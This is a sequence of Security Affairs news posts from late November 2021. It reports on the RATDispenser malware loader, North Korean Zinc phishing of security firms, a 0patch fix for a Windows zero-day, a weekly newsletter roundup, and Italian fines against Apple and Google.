The Cerebro surveillance software allows spying in real-time the electronic communications of a target. The software was allegedly used to repress opponents of Abdel Fattah Al-Sisi. The software allowed the government to identify and arrest more than 40,000 political opponents. in Egypt.

“In all, according to Human Rights Watch and other international organizations, between 40,000 and 60,000 political prisoners are languishing in jails in a country where civil society no longer has any rights.” continues Télérama.

The software also allow dragnet surveillance, according to the brochures presented at Milipol it is an updated copy of Eagle, the program ceded to Gaddafi in 2007. 

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, IKEA)

The post French court indicted Nexa Technologies for complicity in acts of torture appeared first on Security Affairs.

RATDispenser, a new stealthy JavaScript loader used to distribute RATs

28 November 2021 at 15:25

RATDispenser is a new stealthy JavaScript loader that is being used to spread multiple remote access trojans (RATs) into the wild.

Researchers from the HP Threat Research team have discovered a new stealthy JavaScript loader dubbed RATDispenser that is being used to spread a variety of remote access trojans (RATs) in attacks into the wild. Experts pointed out that the use of JavaScript is uncommon as malware file format and for this reason it is more poorly detected.

The loader is highly evasive, at the time of the analysis, it had only 11% detection rate on VirusTotal, HP experts confirmed that it was employed to distribute at least eight RAT families during 2021 (STRRAT, WSHRAT, AdWind, Formbook, Remcos, Panda Stealer, GuLoader, and Ratty). The experts believe that the threat actors behind the RATDispenser may be operating a malware-as-a-service model.

“As with most attacks involving JavaScript malware, RATDispenser is used to gain an initial foothold on a system before launching secondary malware that establishes control over the compromised device. Interestingly, our investigation found that RATDispenser is predominantly being used as a dropper (in 94% of samples analyzed), meaning the malware doesn’t communicate over the network to deliver a malicious payload.” reads the report published by HP.

The attack chain starts with a phishing email using a JavaScript attachment using ‘.TXT.js’ double-extension to trick victims into believing that they are opening a harmless text file.

RATDispenser

Upon launching the malicious code, the JavaScript decodes itself at runtime and writes a VBScript file to the %TEMP% folder using cmd.exe. Then the VBScript downloads and executes the final RAT payload.

HP researchers run a retrohunt over the last three months with this YARA rule and identified 155 RATDispenser samples, belonging to a three different variants. The experts also developed a wrote a Python script to recover the final payload and discovered that:

  • 145 of the 155 samples (94%) were droppers. Only 10 samples were downloaders that communicate over the network to download a secondary stage of malware
  • 8 malware families delivered as payloads
  • All the payloads were remote access Trojans (RATs), keyloggers and information stealers

STRRAT and WSHRAT accounted for 81% of the samples analyzed by the researchers. “Using each sample’s earliest scan result, on average the RATDispenser samples were only detected by 11% of available anti-virus engines, or eight engines in absolute numbers.”

HP researchers published a set of hashes, URLs, YARA rule and extraction script in the HP Threat Research GitHub repository.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, RATDispenser)

The post RATDispenser, a new stealthy JavaScript loader used to distribute RATs appeared first on Security Affairs.

North Korea-linked Zinc group posed as Samsung recruiters to target security firms

28 November 2021 at 12:11

North Korea-linked threat actors posed as Samsung recruiters in a spear-phishing campaign aimed at employees at South Korean security firms.

North Korea-linked APT group posed as Samsung recruiters is a spear-phishing campaign that targeted South Korean security companies that sell anti-malware solutions, Google TAG researchers reported.

According to the Google Threat Horizons report, the state-sponsored hackers sent fake job offers to employees at the security companies. Google TAG researchers reported that the same group, tracked as Zinc,” also targeted security researchers in past campaigns

“TAG observed a North Korean government-backed attacker group that previously targeted security researchers posing as recruiters at Samsung and sending fake job opportunities to employees at multiple South Korean information security companies that sell anti-malware solutions.” reads the Google Threat Horizons report. “The emails included a PDF allegedly claiming to be of a job description for a role at Samsung; however, the PDFs were malformed and did not open in a standard PDF reader. When targets replied that they could not open the job description, attackers responded with a malicious link to malware purporting to be a “Secure PDF Reader” stored in Google Drive which has now been blocked.”

The attackers used a malformed PDF claiming to be a job description for a role at Samsung, for this reason, the recipient was not able to open it and contacted the sender that in turn provided him with a link to a “Secure PDF Reader” app.

The app, which was stored in Google Drive, was a tainted version of the legitimate PDF reader PDFTron. Upon installing the app a backdoor is established on the victims’ devices.

North Korea-linked APT phishing

The activity of the Zinc APT group, aka Lazarus, surged in 2014 and 2015, its members used mostly custom-tailored malware in their attacks. This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed to destroy data and disrupt systems.

The group is considered responsible for the massive WannaCry ransomware attack, a string of SWIFT attacks in 2016, and the Sony Pictures hack. The attackers targeted the researchers through multiple social networking platforms, including Twitter, LinkedIn, Telegram, Discord, and Keybase.

Threat actors used a network of fake profiles to get in contact with researchers of interest. In mid-2020, ZINC hackers created Twitter profiles for fake security researchers that were used to retweet security content and posting about vulnerability research. 

North Korea

Attackers used Twitter profiles for sharing links to a blog under their control (br0vvnn[.]io), to share videos of their claimed exploits, and for amplifying and retweeting posts from other accounts under their control.

Once established initial communications, the attackers would ask the targeted security researcher if they wanted to collaborate on vulnerability research together, and then shared with it a Visual Studio Project.

The Visual Studio project used by the attackers included the source code for exploiting the vulnerability along with an additional DLL that would be executed through Visual Studio Build Events, which is a backdoor.

The Visual Studio project was containing a malicious DLL that would be executed when researchers compiled the project.

The malicious code would lead to the installation of a backdoor that would allow the attackers to take over the target’s computer.

The attackers published a blog post titled “DOS2RCE: A New Technique To Exploit V8 NULL Pointer Dereference Bug” and shared it via Twitter. The researchers who visited the post from October 19 to 21, 2020, using the Chrome browser, were infected with a known ZINC malware. Microsoft researchers noticed that some of the victims were using fully patched browsers, a circumstance that suggests that attackers used 0-day exploits. Not all visitors to the site were infected.

Attackers also used other techniques to target security professionals, for example in some cases distributed blog posts as MHTML files that contained some obfuscated JavaScript that was pointing to a ZINC-controlled domain for further JavaScript to execute. 

In one case, attackers attempted to exploit, without success, the CVE-2017-16238 vulnerability in a vulnerable driver for the antivirus product called Vir.IT eXplorer.

The recent attacks against South Korean anti-malware suggest the interests of threat actors in compromising the supply chain of South Korean security organizations in order to target their customers.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, North Korea)

The post North Korea-linked Zinc group posed as Samsung recruiters to target security firms appeared first on Security Affairs.

0patch releases unofficial patches for CVE-2021-24084 Windows 10 zero-day

28 November 2021 at 10:55

0patch released free unofficial patches for Windows local privilege escalation zero-day (CVE-2021-24084) in Windows 10, version 1809 and later.

0patch released free unofficial patches for Windows local privilege escalation zero-day (CVE-2021-24084) in Windows 10, version 1809 and later. The issue doesn’t impact Windows Servers because the vulnerable functionality in not implemented in these OSs.

The issue resides in the  “Access work or school” settings of the Mobile Device Management Service. The vulnerability, discovered by the security researcher Abdelhamid Naceri, can be exploited to bypass a patch released by Microsoft in February to address another information disclosure flaw (CVE-2021-24084) reported by the same expert.

Naceri reported this month that the vulnerability has yet to be addressed and can be exploited to escalate privileges.

I mean this is still unpatched and allow LPE if shadow volume copies are enabled;
But I noticed that it doesn't work on windows 11 https://t.co/HJcZ6ew8PO

— Abdelhamid Naceri (@KLINIX5) November 15, 2021

“Namely, as HiveNightmare/SeriousSAM has taught us, an arbitrary file disclosure can* be upgraded to local privilege escalation if you know which files to take and what to do with them. We confirmed this by using the procedure described in this blog post by Raj Chandel in conjunction with Abdelhamid’s bug – and being able to run code as local administrator.” wrote 0patch co-founder Mitja Kolsek. “Two conditions need to be met in order for the local privilege escalation to work:

  1. System protection must be enabled on drive C, and at least one restore point created. Whether system protection is enabled or disabled by default depends on various parameters.  
  2. At least one local administrator account must be enabled on the computer, or at least one “Administrators” group member’s credentials cached.”

0patch released unofficial patches for:

  1. Windows 10 v21H1 (32 & 64 bit) updated with November 2021 Updates
  2. Windows 10 v20H2 (32 & 64 bit)updated with November 2021 Updates
  3. Windows 10 v2004 (32 & 64 bit)updated with November 2021 Updates
  4. Windows 10 v1909 (32 & 64 bit)updated with November 2021 Updates
  5. Windows 10 v1903 (32 & 64 bit)updated with November 2021 Updates
  6. Windows 10 v1809 (32 & 64 bit)updated with May 2021 Updates

0patch will provide free micropatches for this vulnerability until Microsoft has issued an official patch. Users that want to install the micropatches can create a free account in 0patch Central, then install 0patch Agent from 0patch.com. The company pointed out that no computer reboots will be needed.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Windows)

The post 0patch releases unofficial patches for CVE-2021-24084 Windows 10 zero-day appeared first on Security Affairs.

Security Affairs newsletter Round 342

28 November 2021 at 10:38

A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box.

If you want to also receive for free the newsletter with the international press subscribe here.

Italy’s Antitrust Agency fines Apple and Google for aggressive practices of data acquisition
HAEICHI-II: Interpol arrested +1,000 suspects linked to various cybercrimes
IKEA hit by a cyber attack that uses stolen internal reply-chain emails
Marine services provider Swire Pacific Offshore (SPO) hit by Clop ransomware
Threat actors target crypto and NFT communities with Babadeda crypter
Exclusive: Resecurity discovered 0-day vulnerability in TP-Link Wi-Fi 6 devices
APT C-23 group targets Middle East with an enhanced Android spyware variant
New Linux CronRAT hides in cron jobs to evade detection in Magecart attacks
Several GoDaddy brands impacted in recent data breach
Iranian threat actors exploit MS MSHTML bug to steal Google and Instagram credentials
FBI warns of crooks targeting online shoppers during the holiday season
VMware addresses File Read and SSRF flaws in vCenter Server
A vulnerable honeypot exposed online can be compromised in 24 hours
Apple sues NSO Group for abusing state-sponsored Pegasus spyware
Expert discloses details of flaws in Oracle VirtualBox
Malware are already attempting to exploit new Windows Installer zero-day
Android.Cynos.7.origin trojan infected +9 million Android devices
Experts warn of RCE flaw in Imunify360 security platform
Expert released PoC exploit code for Microsoft Exchange CVE-2021-42321 RCE bug
Expert disclosed an exploit for a new Windows zero-day local privilege elevation issue
US govt warns critical infrastructure of ransomware attacks during holidays
New GoDaddy data breach impacted 1.2 million customers
Utah Imaging Associates data breach impacts 583,643 patients
Iran’s Mahan Air claims it has failed a cyber attack, hackers say the opposite
New Memento ransomware uses password-protected WinRAR archives to block access to the files
US SEC warns investors of ongoing fraudulent communications claiming from the SEC
Experts found 11 malicious Python packages in the PyPI repository
Researchers were able to access the payment portal of the Conti gang
Attackers compromise Microsoft Exchange servers to hijack internal email chains

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, newsletter)

The post Security Affairs newsletter Round 342 appeared first on Security Affairs.

Italy’s Antitrust Agency fines Apple and Google for aggressive practices of data acquisition

27 November 2021 at 16:32

Italy’s antitrust regulator, Autorità Garante della Concorrenza e del Mercato (AGCM), has fined Apple and Google €10 million each their “aggressive” data practices.

Italy’s antitrust regulator, Autorità Garante della Concorrenza e del Mercato (AGCM), has fined Apple and Google €10 million each their “aggressive” data practices and the lack of transparency on the use of customers’ personal data.

Both companies were fined due to violations of the Consumer Code for aggressive practices related to the acquisition and use of consumer data for commercial purposes.

Italy’s antitrust regulator has fined both Apple and Google €10 million each for what it calls are “aggressive” data practices and not providing consumers with clear information on commercial uses of their personal data during the account creation phase. 10 million euros is the maximum fine permitted according to current legislation.

“The Authority found that both Google and Apple did not provide clear and immediate information on the acquisition and use of user data for commercial purposes.” reads the press release published by the AGCM. “In particular, Google, both in the account creation phase, which is essential for the use of all the services offered, and during the use of the services themselves, omits relevant information that the consumer needs to consciously decide to accept that the Company collects and uses their personal information for commercial purposes. Apple , both in the phase of creating the Apple ID and on the occasion of accessing the Apple Stores (App Store, iTunes Store and Apple Books), does not immediately and explicitly provide the user with any indication on the collection and use of your data for commercial purposes, emphasizing only that data collection is necessary to improve the consumer experience and use of services.”

The Italian Authority pointed out that in the account creation phase, Google pre-sets the user’s acceptance of the transfer and/or use of their data for commercial purposes.

In the case of Apple, the IT giant was accused of acquiring consent to the use of user data for commercial purposes without providing the consumer with the possibility of a prior and express consent on sharing their data.

Pierluigi Paganini

(SecurityAffairs – hacking, Apple)

The post Italy’s Antitrust Agency fines Apple and Google for aggressive practices of data acquisition appeared first on Security Affairs.

❌